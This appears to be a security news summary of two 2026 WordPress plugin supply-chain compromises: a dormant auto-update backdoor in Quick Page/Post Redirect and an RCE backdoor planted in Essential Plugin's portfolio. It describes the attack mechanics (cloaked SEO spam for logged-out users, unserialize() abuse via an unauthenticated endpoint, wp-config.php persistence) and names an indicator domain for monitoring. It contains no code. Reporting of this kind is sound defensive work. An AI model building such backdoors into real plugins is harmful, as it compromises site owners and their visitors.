WordPress Supply Chain Attacks: Dormant Backdoors and RCE in Plugins

Can an automatic update turn into the most lethal weapon against your website? Just two weeks after the massive Essential Plugin case, the WordPress ecosystem is again in shock due to a dormant backdoor lasting about 5 years in the Quick Page/Post Redirect plugin. On April 30, 2026, WordPress.org temporarily removed the extension, highlighting how attackers exploit trust in updates and code longevity to inject malware and cloaked SEO spam.

The Quick Page/Post Redirect Case: A 5-Year Backdoor

On April 30, 2026, WordPress.org temporarily removed the Quick Page/Post Redirect plugin pending a complete security review. The removal brought to light an unprecedented compromise due to its longevity: the plugin contained a backdoor added about 5 years ago (around 2021) that allowed arbitrary code injection through a hidden auto-update mechanism. The backdoor, in fact, had remained silent and invisible for half a decade.

Attackers devised a hidden auto-update mechanism that bypassed official WordPress channels. This compromised system pointed to the external domain anadnet[.]com to download arbitrary code at any time. Through this clandestine communication channel, a tampered 5.2.3 build was pushed from the external server directly to infected sites. This altered version added a passive SEO backdoor, which activated by modifying content via the 'the_content' filter, but exclusively for logged-out users, applying a cloaking technique to avoid being detected by site administrators.

The Dynamics of the April 2026 Essential Plugin Attack

Although the attacks share the goal of cloaked SEO spam, it is crucial to distinguish the Quick Page/Post Redirect incident from the massive compromise that hit the Essential Plugin company in mid-April 2026. In this second case, the threat did not stem from code dormant for years, but from a malicious acquisition. In early 2025, Essential Plugin was sold to a buyer with a background in the SEO and crypto sectors. The buyer leveraged the new position to insert an RCE (Remote Code Execution) backdoor through a specifically created module, named wpos-analytics.

The vulnerability, introduced and detected in the ecosystem around August 8, 2025, exploited an unserialize() function and an unauthenticated REST API endpoint. The backdoor remained dormant for about 8 months. The activation occurred between April 5 and 6, 2026, injecting code into wp-config.php to ensure persistence. On April 8, 2026, WordPress.org reacted by permanently closing the 31 plugins in the Essential Plugin portfolio and forcing an auto-update (version 2.6.9.1) to neutralize the phone-home logic.

How Attackers Exploit Trust in the Supply Chain

These two consecutive episodes demonstrate how supply chain attacks are becoming the preferred vector for compromising WordPress sites. By exploiting users' trust in automatic updates and the longevity of plugins present in official directories, attackers manage to inject malicious code on a large scale. The acquisition of Essential Plugin by a buyer with an SEO and crypto background allowed the insertion of an RCE backdoor that remained dormant for about 8 months before activating. Similarly, Quick Page/Post Redirect was compromised about 5 years ago with a hidden auto-update mechanism pointing to external domains to download arbitrary code.

Prevention and Mitigation of Unauthorized Access

Faced with such sophisticated threats, where the update mechanism itself is compromised, simple trust in the official repository is no longer sufficient. Official countermeasures proved necessary: in the Essential Plugin case, WordPress.org permanently closed the 31 plugins and on April 8, 2026, forced an auto-update (v2.6.9.1) to neutralize the phone-home logic. For Quick Page/Post Redirect, WordPress.org temporarily removed the plugin on April 30, 2026, pending review. The longevity of dormant backdoors makes it essential to monitor outbound network traffic to unauthorized external domains, such as anadnet[.]com, and analyze unauthorized changes to critical system files, as happened with wp-config.php.

Frequently Asked Questions

How do supply chain attacks occur in WordPress?

Attackers compromise the software distribution channel, for example by acquiring a developer company or inserting malicious code in an official update. By exploiting users' trust in automatic updates, the malware is installed directly on victim sites without requiring direct interaction.

What is the risk of dormant backdoors in plugins?

A dormant backdoor remains inactive for months or years, making its detection extremely difficult. It allows attackers to accumulate a vast number of infected sites before simultaneously activating the payload, such as the injection of cloaked SEO spam or the modification of database configuration files.

What happened to the Essential Plugin and Quick Page/Post Redirect plugins?

The 31 Essential Plugin plugins were permanently closed on April 8, 2026, after an RCE backdoor, dormant for about 8 months, was activated by injecting code into wp-config.php. On April 30, 2026, Quick Page/Post Redirect was temporarily removed from WordPress.org due to a backdoor added about 5 years ago that allowed arbitrary code injection through a hidden auto-update mechanism.

This article is a summary based exclusively on the listed sources.

Sources

• https://xlogic.org/blog/che-cosa-sono-gli-attacchi-alla-supply-chain-e-come-stanno-aumentando-nei-plugin-wordpress.html/
• https://www.ilsoftware.it/wordpress-attacco-backdoor-plugin/
• https://prothect.it/attacco/attacco-hacker-wordpress-backdoor-javascript/
• https://www.cybersecurity360.it/nuove-minacce/wordpress-la-backdoor-si-nasconde-in-temi-e-plugin-come-difendersi/
• https://www.trendmicro.com/it_it/what-is/cyber-attack/supply-chain-attack.html